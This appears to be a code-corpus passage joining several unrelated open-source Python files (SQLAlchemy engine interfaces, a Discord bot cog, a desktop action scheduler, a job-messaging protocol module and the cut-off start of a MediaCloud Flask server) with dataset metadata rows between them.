once upon first connect.
"""
raise NotImplementedError()
def do_begin(self, dbapi_connection):
"""Provide an implementation of ``connection.begin()``, given a
DB-API connection.
The DBAPI has no dedicated "begin" method and it is expected
that transactions are implicit. This hook is provided for those
DBAPIs that might need additional help in this area.
Note that :meth:`.Dialect.do_begin` is not called unless a
:class:`.Transaction` object is in use. The
:meth:`.Dialect.do_autocommit`
hook is provided for DBAPIs that need some extra commands emitted
after a commit in order to enter the next transaction, when the
SQLAlchemy :class:`.Connection` is used in its default "autocommit"
mode.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_rollback(self, dbapi_connection):
"""Provide an implementation of ``connection.rollback()``, given
a DB-API connection.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_commit(self, dbapi_connection):
"""Provide an implementation of ``connection.commit()``, given a
DB-API connection.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_close(self, dbapi_connection):
"""Provide an implementation of ``connection.close()``, given a DBAPI
connection.
This hook is called by the :class:`.Pool` when a connection has been
detached from the pool, or is being returned beyond the normal
capacity of the pool.
.. versionadded:: 0.8
"""
raise NotImplementedError()
def create_xid(self):
"""Create a two-phase transaction ID.
This id will be passed to do_begin_twophase(),
do_rollback_twophase(), do_commit_twophase(). Its format is
unspecified.
"""
raise NotImplementedError()
def do_savepoint(self, connection, name):
"""Create a savepoint with the given name.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_rollback_to_savepoint(self, connection, name):
"""Rollback a connection to the named savepoint.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_release_savepoint(self, connection, name):
"""Release the named savepoint on a connection.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_begin_twophase(self, connection, xid):
"""Begin a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
"""
raise NotImplementedError()
def do_prepare_twophase(self, connection, xid):
"""Prepare a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
"""
raise NotImplementedError()
def do_rollback_twophase(self, connection, xid, is_prepared=True,
recover=False):
"""Rollback a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
:param is_prepared: whether or not
:meth:`.TwoPhaseTransaction.prepare` was called.
:param recover: if the recover flag was passed.
"""
raise NotImplementedError()
def do_commit_twophase(self, connection, xid, is_prepared=True,
recover=False):
"""Commit a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
:param is_prepared: whether or not
:meth:`.TwoPhaseTransaction.prepare` was called.
:param recover: if the recover flag was passed.
"""
raise NotImplementedError()
def do_recover_twophase(self, connection):
"""Recover list of uncommited prepared two phase transaction
identifiers on the given connection.
:param connection: a :class:`.Connection`.
"""
raise NotImplementedError()
def do_executemany(self, cursor, statement, parameters, context=None):
"""Provide an implementation of ``cursor.executemany(statement,
parameters)``."""
raise NotImplementedError()
def do_execute(self, cursor, statement, parameters, context=None):
"""Provide an implementation of ``cursor.execute(statement,
parameters)``."""
raise NotImplementedError()
def do_execute_no_params(self, cursor, statement, parameters,
context=None):
"""Provide an implementation of ``cursor.execute(statement)``.
The parameter collection should not be sent.
"""
raise NotImplementedError()
def is_disconnect(self, e, connection, cursor):
"""Return True if the given DB-API error indicates an invalid
connection"""
raise NotImplementedError()
def connect(self):
"""return a callable which sets up a newly created DBAPI connection.
The callable accepts a single argument "conn" which is the
DBAPI connection itself. It has no return value.
This is used to set dialect-wide per-connection options such as
isolation modes, unicode modes, etc.
If a callable is returned, it will be assembled into a pool listener
that receives the direct DBAPI connection, with all wrappers removed.
If None is returned, no listener will be generated.
"""
return None
def reset_isolation_level(self, dbapi_conn):
"""Given a DBAPI connection, revert its isolation to the default."""
raise NotImplementedError()
def set_isolation_level(self, dbapi_conn, level):
"""Given a DBAPI connection, set its isolation level."""
raise NotImplementedError()
def get_isolation_level(self, dbapi_conn):
"""Given a DBAPI connection, return its isolation level."""
raise NotImplementedError()
class ExecutionContext(object):
"""A messenger object for a Dialect that corresponds to a single
execution.
ExecutionContext should have these data members:
connection
Connection object which can be freely used by default value
generators to execute SQL. This Connection should reference the
same underlying connection/transactional resources of
root_connection.
root_connection
Connection object which is the source of this ExecutionContext. This
Connection may have close_with_result=True set, in which case it can
only be used once.
dialect
dialect which created this ExecutionContext.
cursor
DB-API cursor procured from the connection,
compiled
if passed to constructor, sqlalchemy.engine.base.Compiled object
being executed,
statement
string version of the statement to be executed. Is either
passed to the constructor, or must be created from the
sql.Compiled object by the time pre_exec() has completed.
parameters
bind parameters passed to the execute() method. For compiled
statements, this is a dictionary or list of dictionaries. For
textual statements, it should be in a format suitable for the
dialect's paramstyle (i.e. dict or list of dicts for non
positional, list or list of lists/tuples for positional).
isinsert
True if the statement is an INSERT.
isupdate
True if the statement is an UPDATE.
should_autocommit
True if the statement is a "committable" statement.
prefetch_cols
a list of Column objects for which a client-side default
was fired off. Applies to inserts and updates.
postfetch_cols
a list of Column objects for which a server-side default or
inline SQL expression value was fired off. Applies to inserts
and updates.
"""
exception = None
"""A DBAPI-level exception that was caught when this ExecutionContext
attempted to execute a statement.
This attribute is meaningful only within the
:meth:`.ConnectionEvents.dbapi_error` event.
.. versionadded:: 0.9.7
.. seealso::
:attr:`.ExecutionContext.is_disconnect`
:meth:`.ConnectionEvents.dbapi_error`
"""
is_disconnect = None
"""Boolean flag set to True or False when a DBAPI-level exception
is caught when this ExecutionContext attempted to execute a statement.
This attribute is meaningful only within the
:meth:`.ConnectionEvents.dbapi_error` event.
.. versionadded:: 0.9.7
.. seealso::
:attr:`.ExecutionContext.exception`
:meth:`.ConnectionEvents.dbapi_error`
"""
def create_cursor(self):
"""Return a new cursor generated from this ExecutionContext's
connection.
Some dialects may wish to change the behavior of
connection.cursor(), such as postgresql which may return a PG
"server side" cursor.
"""
raise NotImplementedError()
def pre_exec(self):
"""Called before an execution of a compiled statement.
If a compiled statement was passed to this ExecutionContext,
the `statement` and `parameters` datamembers must be
initialized after this statement is complete.
"""
raise NotImplementedError()
def post_exec(self):
"""Called after the execution of a compiled statement.
If a compiled statement was passed to this ExecutionContext,
the `last_insert_ids`, `last_inserted_params`, etc.
datamembers should be available after this method completes.
"""
raise NotImplementedError()
def result(self):
"""Return a result object corresponding to this ExecutionContext.
Returns a ResultProxy.
"""
raise NotImplementedError()
def handle_dbapi_exception(self, e):
"""Receive a DBAPI exception which occurred upon execute, result
fetch, etc."""
raise NotImplementedError()
def should_autocommit_text(self, statement):
"""Parse the given textual statement and return True if it refers to
a "committable" statement"""
raise NotImplementedError()
def lastrow_has_defaults(self):
"""Return True if the last INSERT or UPDATE row contained
inlined or database-side defaults.
"""
raise NotImplementedError()
def get_rowcount(self):
"""Return the DBAPI ``cursor.rowcount`` value, or in some
cases an interpreted value.
See :attr:`.ResultProxy.rowcount` for details on this.
"""
raise NotImplementedError()
class Connectable(object):
"""Interface for an object which supports execution of SQL constructs.
The two implementations of :class:`.Connectable` are
:class:`.Connection` and :class:`.Engine`.
Connectable must also implement the 'dialect' member which references a
:class:`.Dialect` instance.
"""
def connect(self, **kwargs):
"""Return a :class:`.Connection` object.
Depending on context, this may be ``self`` if this object
is already an instance of :class:`.Connection`, or a newly
procured :class:`.Connection` if this object is an instance
of :class:`.Engine`.
"""
def contextual_connect(self):
"""Return a :class:`.Connection` object which may be part of an ongoing
context.
Depending on context, this may be ``self`` if this object
is already an instance of :class:`.Connection`, or a newly
procured :class:`.Connection` if this object is an instance
of :class:`.Engine`.
"""
raise NotImplementedError()
@util.deprecated("0.7",
"Use the create() method on the given schema "
"object directly, i.e. :meth:`.Table.create`, "
":meth:`.Index.create`, :meth:`.MetaData.create_all`")
def create(self, entity, **kwargs):
"""Emit CREATE statements for the given schema entity.
"""
raise NotImplementedError()
@util.deprecated("0.7",
"Use the drop() method on the given schema "
"object directly, i.e. :meth:`.Table.drop`, "
":meth:`.Index.drop`, :meth:`.MetaData.drop_all`")
def drop(self, entity, **kwargs):
"""Emit DROP statements for the given schema entity.
"""
raise NotImplementedError()
def execute(self, object, *multiparams, **params):
"""Executes the given construct and returns a :class:`.ResultProxy`."""
raise NotImplementedError()
def scalar(self, object, *multiparams, **params):
"""Executes and returns the first column of the first row.
The underlying cursor is closed after execution.
"""
raise NotImplementedError()
def _run_visitor(self, visitorcallable, element,
**kwargs):
raise NotImplementedError()
def _execute_clauseelement(self, elem, multiparams=None, params=None):
raise NotImplementedError()
class ExceptionContext(object):
"""Encapsulate information about an error condition in progress.
This object exists solely to be passed to the
:meth:`.ConnectionEvents.handle_error` event, supporting an interface that
can be extended without backwards-incompatibility.
.. versionadded:: 0.9.7
"""
connection = None
"""The :class:`.Connection` in use during the exception.
This member is always present.
"""
cursor = None
"""The DBAPI cursor object.
May be None.
"""
statement = None
"""String SQL statement that was emitted directly to the DBAPI.
May be None.
"""
parameters = None
"""Parameter collection that was emitted directly to the DBAPI.
May be None.
"""
original_exception = None
"""The exception object which was caught.
This member is always present.
"""
sqlalchemy_exception = None
"""The :class:`sqlalchemy.exc.StatementError` which wraps the original,
and will be raised if exception handling is not circumvented by the event.
May be None, as not all exception types are wrapped by SQLAlchemy.
For DBAPI-level exceptions that subclass the dbapi's Error class, this
field will always be present.
"""
chained_exception = None
"""The exception that was returned by the previous handler in the
exception chain, if any.
If present, this exception will be the one ultimately raised by
SQLAlchemy unless a subsequent handler replaces it.
May be None.
"""
execution_context = None
"""The :class:`.ExecutionContext` corresponding to the execution
operation in progress.
This is present for statement execution operations, but not for
operations such as transaction begin/end. It also is not present when
the exception was raised before the :class:`.ExecutionContext`
could be constructed.
Note that the :attr:`.ExceptionContext.statement` and
:attr:`.ExceptionContext.parameters` members may represent a
different value than that of the :class:`.ExecutionContext`,
potentially in the case where a
:meth:`.ConnectionEvents.before_cursor_execute` event or similar
modified the statement/parameters to be sent.
May be None.
"""
is_disconnect = None
"""Represent whether the exception as occurred represents a "disconnect"
condition.
This flag will always be True or False within the scope of the
:meth:`.ConnectionEvents.handle_error` handler.
SQLAlchemy will defer to this flag in order to determine whether or not
the connection should be invalidated subsequently. That is, by
assigning to this flag, a "disconnect" event which then results in
a connection and pool invalidation can be invoked or prevented by
changing this flag.
"""
|
mit
| -8,414,418,792,345,684,000 | 29.727181 | 84 | 0.658844 | false |
oyisre/discordbottery
|
cogs/tasks.py
|
1
|
2963
|
from discord.ext import commands
from cogs import queries
import aiohttp
import asyncio
import random
import time
# global vars
session = aiohttp.ClientSession()
class Tasks:
"""auto"""
def __init__(self, bot: commands.Bot):
self.bot = bot
async def zooboys(self):
""" sends a message to a certain server at the specified time """
await self.bot.wait_until_ready()
while not self.bot.is_closed:
cur_time = time.localtime()
if cur_time.tm_hour == 17 and cur_time.tm_min == 48:
await self.bot.send_message(self.bot.get_channel('144849743368028160'),
chr(random.randint(97, 122))) # Random letter
await asyncio.sleep(60)
async def who_up(self):
""" night watch """
await self.bot.wait_until_ready()
who_up_words = ['NOTION', 'NUTRIENT', 'SAD', ':clown::clown::clown:',
'NEIGHBOUR', 'WILD', 'THOT', 'DANIEL', 'NEUTRON', 'gnarls barkley',
'neutrino', 'nuremberg', 'sour', 'power!', 'coward', 'flower',
'idiot', 'useless', 'horus']
who_up_min = random.randint(27, 59)
who_up_hour = 5
while not self.bot.is_closed:
cur_time = time.localtime()
if cur_time.tm_hour == who_up_hour and cur_time.tm_min == who_up_min:
who_up_word = random.randint(0, len(who_up_words) - 1)
await self.bot.send_message(self.bot.get_channel(
'144849743368028160'),
"IT'S REAL {} HOURS".format(who_up_words[who_up_word]))
await asyncio.sleep(1)
await self.bot.send_message(self.bot.get_channel(
'144849743368028160'), "WHO UP")
# Useless now that the bing image api is gone
#res = 'first'
res = None
while res is not None:
res = await self.bot.wait_for_message(
timeout=180,
channel=self.bot.get_channel('144849743368028160'))
image_url = await queries.bing_img_search(
'real {} hours'.format(who_up_words[who_up_word]),
safe=False,
offset=random.randint(0, 100))
async with session.get(image_url) as r:
file_name = image_url.rsplit('/', 1)[1]
file = await r.read()
with open(file_name, 'wb') as f:
f.write(file)
with open(file_name, 'rb') as f:
await self.bot.send_file(
self.bot.get_channel('144849743368028160'), f,
filename=file_name)
await asyncio.sleep(59)
def close_aiohttp():
session.close()
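# Illustrative wiring (assumed bot setup, not part of this cog):
# tasks = Tasks(bot)
# bot.loop.create_task(tasks.zooboys())
# bot.loop.create_task(tasks.who_up())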
|
unlicense
| 598,148,637,547,744,300 | 41.328571 | 91 | 0.498819 | false |
swprojects/Advanced-Action-Scheduler
|
advancedactionscheduler/schedulemanager.py
|
1
|
12301
|
# -*- coding: utf-8 -*-
"""
@author Simon Wu <swprojects@runbox.com>
Copyright (c) 2018 by Simon Wu <Advanced Action Scheduler>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import logging
import platform
import subprocess
import time
import wx
import advwebbrowser
from ast import literal_eval as make_tuple
from apscheduler.triggers.cron import CronTrigger
from apscheduler.schedulers.background import BackgroundScheduler
PLATFORM = platform.system()
if PLATFORM == "Windows":
from win import actionmanager as actman
elif PLATFORM == "Linux":
from linux import actionmanager as actman
DELIMITER = " ➡ "
class Manager:
def __init__(self, parent):
self._parent = parent
self._schedules = {}
self._schedData = {}
self._webbrowser = advwebbrowser
self._browsers = {} # registered browsers
def AddSchedule(self, groupName, schedStr, enabled):
"""Parse the schedule string and add schedule"""
schedName, schedTime = schedStr.split(DELIMITER)
schedTime = make_tuple(schedTime)
schedTime = {k: v for k, v in schedTime}
params = {}
for timeVar in ["dof", "h", "m", "s"]:
if timeVar in schedTime:
params[timeVar] = ",".join([t for t in schedTime[timeVar]])
else:
params[timeVar] = "*"
schedule = BackgroundScheduler()
cronTrig = CronTrigger(day_of_week=params["dof"],
hour=params["h"],
minute=params["m"],
second=params["s"])
args = (groupName, schedName)
schedule.add_job(self.OnSchedule, args=[args], trigger=cronTrig)
# attach a listener to schedule events
try:
self._schedules[groupName].append((schedName, schedule, enabled))
except Exception as e:
logging.info(e)
self._schedules[groupName] = [(schedName, schedule, enabled)]
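# Example (format inferred from the parsing above; names and times are
# hypothetical): a schedule string such as
#   "Backup ➡ (('h', ('1', '13')), ('m', ('30',)), ('s', ('0',)))"
# yields CronTrigger(day_of_week='*', hour='1,13', minute='30', second='0'),
# i.e. the job fires at 01:30:00 and 13:30:00 every day.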
def AddScheduleItem(self, groupName, schedName, index, schedItemStr):
""" parse the schedItemStr to an action """
action, paramStr = schedItemStr.split(DELIMITER)
params = {k: v for k, v in make_tuple(paramStr)}
self._schedData[groupName][schedName].append((index, action, params))
def DoAction(self, groupName, schedName, action, kwargs):
logging.info("Executing action: %s" % action)
logging.info("parameters: %s" % str(kwargs))
logData = {"Group": groupName, "Schedule": schedName, "Message": action}
if action == "CloseWindow":
actman.CloseWindow(kwargs)
logData["Message"] = "CloseWindow: {0}".format(kwargs["window"])
elif action == "Delay":
delay = kwargs["delay"]
time.sleep(float(delay)) # remove the 's'
logData["Message"] = "Delay: {0} seconds".format(delay)
self.SendLog(logData)
elif action == "IfWindowOpen":
window = kwargs["window"]
kwargs["matches"] = 1
if not actman.FindWindow(kwargs):
logData["Message"] = "IfWindowOpen: {0} ...not found".format(window)
self.SendLog(logData)
return
else:
logData["Message"] = "IfWindowOpen: {0} ...found".format(window)
self.SendLog(logData)
elif action == "IfWindowNotOpen":
window = kwargs["window"]
kwargs["matches"] = 1
if not actman.FindWindow(kwargs):
logData["Message"] = "IfWindowOpen: {0} ...not found".format(window)
self.SendLog(logData)
else:
logData["Message"] = "IfWindowOpen: {0} ...found".format(window)
self.SendLog(logData)
return
elif action == "MouseClickAbsolute":
window = kwargs["window"]
actman.MouseClickAbsolute(kwargs)
logData["Message"] = "MouseClickRelative: {0}".format(window)
elif action == "MouseClickRelative":
window = kwargs["window"]
actman.MouseClickRelative(kwargs)
logData["Message"] = "MouseClickRelative: {0}".format(window)
elif action == "NewProcess":
# remove leading and trailing whitespace
cmd = [s.strip() for s in kwargs["cmd"].split(",")]
try:
subprocess.call(cmd)
logData["Message"] = "NewProcess: {0}".format(cmd)
except FileNotFoundError as e:
logData["Message"] = "NewProcess: {0}, {1}".format(cmd, e)
except PermissionError as e:
logData["Message"] = "NewProcess: {0}, {1}".format(cmd, e)
elif action == "OpenURL":
self.OpenURL(kwargs)
logData["Message"] = "OpenURL: {0}, {1}".format(kwargs["url"], kwargs["browser"])
elif action == "Power":
logData["Message"] = "Power: {0}, {1}".format(kwargs["action"], kwargs["alert"])
self.GetParent().OnPowerAction(kwargs)
elif action == "SwitchWindow":
kwargs["matches"] = 1
actman.SwitchWindow(kwargs)
logData["Message"] = "SwitchWindow: {0}".format(kwargs["window"])
self.SendLog(logData)
return True
def GetParent(self):
return self._parent
def OnSchedule(self, args):
groupName, schedName = args
childIgnore = ()
for index, action, params in self._schedData[groupName][schedName]:
if childIgnore and index.startswith(childIgnore):  # skip children of failed conditions
continue
# print(action)
if action == "StopSchedule":
schedule = params["schedule"]
self.StartSchedule(groupName, schedule, enable=0)
if schedule == schedName:
return
elif action == "StartSchedule":
schedule = params["schedule"]
self.StartSchedule(groupName, schedule, enable=1)
if schedule == schedName:
return
elif action == "Control":
logData = {"Group": groupName, "Schedule": schedName}
logData["Message"] = "Control: {0}".format(params["action"])
if params["action"] == "END":
self.SendLog(logData)
return
elif params["action"] == "Disable Schedule Manager":
self.GetParent().DisableScheduleManager()
self.SendLog(logData)
return
else:
a = self.DoAction(groupName, schedName, action, params)
if not a:
childIgnore += (index + ",", )
logData = {"Group": groupName, "Schedule": schedName, "Message": "Executed Schedule"}
self.SendLog(logData)
def OpenURL(self, kwargs):
url = kwargs["url"]
browser = kwargs["browser"]
browserclass = self._webbrowser.klasses[kwargs["browserclass"]]
newwindow = kwargs["newwindow"]
autoraise = kwargs["autoraise"]
try:
b = self._browsers[browser]
except KeyError:
self._webbrowser.register(browser, browserclass)
b = self._webbrowser.get(browser)
self._browsers[browser] = b
except Exception as e:
self.SendLog({"Message": "OpenURL: Error - {0}".format(e)})
return
if newwindow and autoraise:
b.open(url, new=1, autoraise=True)
elif newwindow and not autoraise:
b.open(url, new=1, autoraise=False)
elif not newwindow and autoraise:
b.open(url, new=2, autoraise=True)
elif not newwindow and not autoraise:
b.open(url, new=2, autoraise=False)
self.SendLog({"Message": "OpenURL: {1} ({0})".format(browser, url)})
def SendLog(self, message):
""" pass message to schedule manager lis """
parent = self.GetParent()
wx.CallAfter(parent.AddLogMessage, message)
def SetSchedules(self, data):
"""
receive a tuple list of (groupName, schedList)
"""
# stop and remove schedules first
self.Stop()
childIgnore = ()
# process schedule data
for groupName, schedList in data.items():
self._schedData[groupName] = {}
currentSched = None
for index, itemData in schedList:
# is a schedule?
if "," not in index:
# if itemData["checked"] == 0:
# childIgnore += (index+",",)
# continue
schedStr = itemData["columns"]["0"]
currentSched, _ = schedStr.split(DELIMITER)
self._schedData[groupName][currentSched] = []
self.AddSchedule(groupName, schedStr, itemData["checked"])
continue
if itemData["checked"] == 0 or index.startswith(childIgnore):
childIgnore += (index + ",", )
continue
schedItemStr = itemData["columns"]["0"]
self.AddScheduleItem(groupName, currentSched, index, schedItemStr)
def Start(self):
for groupName, groupScheds in self._schedules.items():
for schedName, schedule, enabled in groupScheds:
if enabled == 0:
continue
schedule.start()
self.SendLog({"Message": "Started schedule {0} from {1} group".format(schedName, groupName)})
def Stop(self):
""" shutdown all schedules """
for groupName, groupScheds in self._schedules.items():
for schedName, schedule, enabled in groupScheds:
if enabled == 0:
continue
schedule.shutdown(wait=False)
self.SendLog({"Message": "Stopped schedule {0} from {1} group".format(schedName, groupName)})
self.SendLog({"Message": "All running schedules have been stopped"})
# clear schedules and data
self._schedules = {}
self._schedData = {}
def StartSchedule(self, groupName, schedName, enable=1):
""" start/stop schedule """
logging.info("{0}, {1}".format(groupName, schedName))
found = None
enabled = None
for n, (name, schedule, e) in enumerate(self._schedules[groupName]):
# print(name, schedName)
if name != schedName:
continue
found = name
enabled = e
break
if not found:
if enable == 1:
msg = "StartSchedule: Could not find schedule {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
else:
msg = "StopSchedule: Could not find schedule {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
return
# start
if enable == 1 and enabled == 0:
self._schedules[groupName][n] = (name, schedule, 1)
schedule.start()
msg = "StartSchedule: {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
elif enable == 1 and enabled == 1:
msg = "StartSchedule: {0} from group: {1} is already running".format(schedName, groupName)
self.SendLog({"Message": msg})
# stop
elif enable == 0 and enabled == 1:
self._schedules[groupName][n] = (name, schedule, 0)
schedule.shutdown(wait=False)
msg = "StopSchedule: {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
elif enable == 0 and enabled == 0:
self._schedules[groupName][n] = (name, schedule, 0)
msg = "StopSchedule: {0} from group: {1} is already stopped".format(schedName, groupName)
self.SendLog({"Message": msg})
|
gpl-2.0
| 7,758,715,840,575,937,000 | 37.077399 | 111 | 0.553947 | false |
Karandash8/CLAUDE
|
framework/message.py
|
1
|
8861
|
'''
Created on May 4, 2017
@author: andrei
'''
import logging
import abc
from framework.misc import exception
class PRTCL_SIGNATURE:
CLAUDE_SYS_PRTCL = 'CLAUDE-SYS-PRTCL'
CLAUDE_DSCVRY_PRTCL = 'CLAUDE-DSCVRY-PRTCL'
CLI_TO_JM_PRTCL = 'CLI-TO-JM-PRTCL'
JM_TO_JS_PRTCL = 'JM-TO-JS-PRTCL'
JS_TO_RD_PRTCL = 'JS-TO-RD-PRTCL'
RD_TO_JM_PRTCL = 'RD-TO-JM-PRTCL'
class MSG_HEADER(object):
"""
"""
header_len = 5
signature_pos = 0
src_pos = 1
dst_pos = 2
version_pos = 3
msg_type_pos = 4
class Header(object):
def __init__(self, header_list):
self._header_as_list = header_list
def get_prtcl_signature(self):
return self._header_as_list[MSG_HEADER.signature_pos]
def get_src(self):
return self._header_as_list[MSG_HEADER.src_pos]
def get_dst(self):
return self._header_as_list[MSG_HEADER.dst_pos]
def get_version(self):
return self._header_as_list[MSG_HEADER.version_pos]
def get_msg_type(self):
return self._header_as_list[MSG_HEADER.msg_type_pos]
def as_list(self):
return self._header_as_list
def __str__(self):
return '<Header(%s)>' % (
self._header_as_list
)
class Message(object):
def __init__(self, header, body):
self.header = Header(header)
self._body_as_list = body
def get_header(self):
return self.header.as_list()
def get_body(self):
return self._body_as_list
def as_list(self):
return self.header.as_list() + self._body_as_list
def __str__(self):
return '<Message(header=%s, body=%s)>' % (
self.header.as_list(),
self._body_as_list
)
class IMessageBuilder(object):
"""
"""
__metaclass__ = abc.ABCMeta
class SysPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.CLAUDE_SYS_PRTCL
version = '1'
def create_add_endpoint(self, src, dst, channel_endpoint, endpoint_name, endpoint_str, routing_key, prtcl_handler):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [channel_endpoint, endpoint_name, endpoint_str, routing_key, prtcl_handler])
return msg
def create_del_endpoint(self, src, dst, endpoint_name):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [endpoint_name])
return msg
class CliToJMPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.CLI_TO_JM_PRTCL
version = '1'
def create_new_job(self, src, dst, job_descriptor):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], job_descriptor)
return msg
def create_job_accepted(self, src, dst, job_name):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name])
return msg
def create_job_done(self, src, dst, job_name, verbose_output):
msg_type = '3'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, verbose_output])
return msg
def create_job_failed(self, src, dst, job_name, error_text):
msg_type = '4'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, error_text])
return msg
class JMToJSPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.JM_TO_JS_PRTCL
version = '1'
def create_new_job(self, src, dst, job_descriptor):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], job_descriptor)
return msg
def create_job_accepted(self, src, dst, job_name):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name])
return msg
def create_job_rejected(self, src, dst, job_name, error_text):
msg_type = '3'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, error_text])
return msg
class JSToRDPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.JS_TO_RD_PRTCL
version = '1'
def create_new_job(self, src, dst, job_descriptor):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], job_descriptor)
return msg
class RDToJMPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.RD_TO_JM_PRTCL
version = '1'
def create_job_done(self, src, dst, job_name, verbose_output):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, verbose_output])
return msg
def create_job_failed(self, src, dst, job_name, error_text):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, error_text])
return msg
class DscvryPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.CLAUDE_DSCVRY_PRTCL
version = '1'
def create_hello(self, src, dst, conn_id, recovery):
msg_type = '10'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, recovery])
return msg
def create_hello_ok(self, src, dst, conn_id):
msg_type = '20'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
def create_hello_er(self, src, dst, conn_id, error_text):
msg_type = '30'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, error_text])
return msg
def create_challenge_req(self, src, dst, conn_id, mechanism, challenge):
msg_type = '40'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, mechanism, challenge])
return msg
def create_challenge_rep(self, src, dst, conn_id, mechanism, response):
msg_type = '50'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, mechanism, response])
return msg
def create_join(self, src, dst, conn_id, group_name, member):
msg_type = '60'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, group_name] + member)
return msg
def create_join_ok(self, src, dst, conn_id, group_name):
msg_type = '70'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id] + group_name)
return msg
def create_join_er(self, src, dst, conn_id, error_text, group_name):
msg_type = '80'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, error_text] + group_name)
return msg
def create_spectate(self, src, dst, conn_id, group_name, status):
msg_type = '90'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, group_name, status])
return msg
def create_spectate_ok(self, src, dst, conn_id):
msg_type = '100'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
def create_spectate_er(self, src, dst, conn_id, error_text):
msg_type = '110'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, error_text])
return msg
def create_member_update(self, src, dst, conn_id, member):
msg_type = '120'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id] + member)
return msg
def create_group_update(self, src, dst, conn_id, init, group_name, member):
msg_type = '130'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, init, group_name] + member)
return msg
def create_hbeat(self, src, dst, conn_id):
msg_type = '140'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
def create_bye(self, src, dst, conn_id):
msg_type = '150'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
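# --- Illustrative usage (an added sketch, not part of the original module) ---
# Shows how a builder produces a Message and how the Header accessors recover
# the routing fields; the src/dst identifiers and job descriptor are made up.
if __name__ == '__main__':
    builder = CliToJMPrtclBuilder()
    msg = builder.create_new_job('cli-1', 'jm-1', ['job-42', 'payload.json'])
    assert msg.header.get_prtcl_signature() == PRTCL_SIGNATURE.CLI_TO_JM_PRTCL
    assert msg.header.get_msg_type() == '1'
    print(msg.as_list())  # header fields followed by the body fields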
|
gpl-3.0
| 3,793,492,110,004,785,000 | 28.638796 | 156 | 0.574879 | false |
mitmedialab/MediaCloud-Web-Tools
|
server/__init__.py
|
1
|
9337
|
import json
import logging.config
import os
import sys
import tempfile
from flask import Flask, render_template
from flask_webpack import Webpack
from flask_mail import Mail
import flask_login
from raven.conf import setup_logging
from raven.contrib.flask import Sentry
from raven.handlers.logging import SentryHandler
import mediacloud.api
from cliff.api import Cliff
import redis
import jinja2
from flask_executor import Executor
from server.sessions import RedisSessionInterface
from server.util.config import get_default_config, ConfigException
from server.commands import sync_frontend_db
from server.database import UserDatabase, AnalyticsDatabase
SERVER_MODE_DEV = "dev"
SERVER_MODE_PROD = "prod"
SERVER_APP_TOPICS = "topics"
SERVER_APP_SOURCES = "sources"
SERVER_APP_TOOLS = "tools"
SERVER_APP_EXPLORER = "explorer"
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
data_dir = os.path.join(base_dir, 'server', 'static', 'data')
# setup logging
with open(os.path.join(base_dir, 'config', 'server-logging.json'), 'r') as f:
logging_config = json.load(f)
logging_config['handlers']['file']['filename'] = os.path.join(base_dir,
